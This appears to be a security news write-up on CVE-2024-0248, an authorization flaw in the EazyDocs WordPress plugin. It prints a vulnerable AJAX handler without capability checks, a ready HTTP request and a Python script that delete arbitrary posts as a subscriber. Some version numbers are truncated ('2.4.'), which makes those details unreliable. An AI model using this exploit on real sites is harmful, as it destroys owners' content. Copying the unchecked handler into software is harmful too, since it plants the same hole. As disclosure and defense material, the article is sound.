CVE CyberSecurity Database News

CVE-2024-0248 - EazyDocs WordPress Plugin Flaw Lets Any User Delete Any Post

Poster -

In the ever-evolving landscape of WordPress security, plugin vulnerabilities continue to surface, putting millions of sites and their users at risk. One such recent threat involves the popular EazyDocs plugin, which helps website owners create beautiful documentation for their products and services. Unfortunately, a serious issue—CVE-2024-0248—has been discovered, allowing even the lowest level WordPress users to delete any post or modify key documents. This vulnerability was reintroduced in version 2.3.8 after being partially fixed before, making it a prime target for attackers.

In this article, we'll break down what CVE-2024-0248 is, how it can be exploited, and what steps users should take to secure their sites. We'll also include code snippets showing how the exploit works, and link to original sources for further reading.

Background: What Happened?

EazyDocs released version 2.3.8, with the intention of providing new features and security updates. However, this update accidentally brought back a critical flaw previously identified as CVE-2023-6029. The flaw allows any logged-in user—even the default Subscriber role—to:

Add or delete documentation documents and sections.

The development team tried to patch it in version 2.3.9, but the issue was only partially fixed.

How the Attack Works

The heart of the problem lies in insecure permissions, especially on the plugin’s AJAX handlers. These endpoints let users create, update, or delete posts and documents with weak or no capability checks.

Example Vulnerable Code (Simplified)

// Inside EazyDocs plugin
add_action('wp_ajax_eazydocs_delete_post', 'eazydocs_delete_post_callback');

function eazydocs_delete_post_callback() {
    // UNSAFE: No capability check!
    $post_id = intval($_POST['post_id']);

    // Deletes any post submitted by ID
    wp_delete_post($post_id, true);
    echo 'success';
    wp_die();
}

This code would allow any logged-in user to send an AJAX request to delete any post, just by providing its post ID. There are no checks to see if the user should be able to do this!

Exploit Example: Deleting the Home Page

Let’s say you are a disgruntled subscriber. Here’s how you could exploit this using your browser or command line:

Step 1: Find any post ID to target. For example, the home page usually has ID 1.

Step 2: While logged in as a subscriber, send the following AJAX POST request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victims-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: [your_wordpress_logged_in_cookie]

action=eazydocs_delete_post&post_id=1

If the flaw exists, this would delete the main page. You could repeat this for any post!

Here’s a simplified Python script showing how an attacker might automate this attack

import requests

url = 'https://victims-site.com/wp-admin/admin-ajax.php';
cookies = {'wordpress_logged_in_xyz': 'your_subscriber_cookie_value'}

data = {
    'action': 'eazydocs_delete_post',
    'post_id': 1  # Target post ID
}

r = requests.post(url, data=data, cookies=cookies)
print(r.text)

You are at risk if

- You use EazyDocs version 2.3.8 (or possibly earlier/later, if not fully patched).

Your site allows user registration, even at Subscriber level.

The vulnerability is fixed in version 2.4. and above. Partially patched in 2.3.9, but not fully secured until 2.4..

What Should You Do?

1. Update Immediately: If you use EazyDocs, update to the latest version (2.4. or newer) from WordPress.org or the plugin page.

2. Check Your Site for Strange Activity: Look for unexplained post deletions or modifications, especially from low-level users.

Follow Security Resources:

- WPScan’s EazyDocs CVE-2023-6029 Advisory
- EazyDocs Changelog

References

- WPScan original report on CVE-2023-6029: Link
- EazyDocs plugin download & changelog: WordPress.org

Conclusion

CVE-2024-0248 is a perfect example of how security flaws in WordPress plugins can come back to haunt site owners. Even a minor update can reintroduce critical vulnerabilities! Stay vigilant, keep plugins updated, and always double check permissions and roles when using any third-party code.

If you’re an EazyDocs user, update now and review your site's user activity—don’t let a simple mistake lead to catastrophic content loss.

Timeline

Published on: 02/12/2024 16:15:08 UTC
Last modified on: 10/09/2024 13:11:10 UTC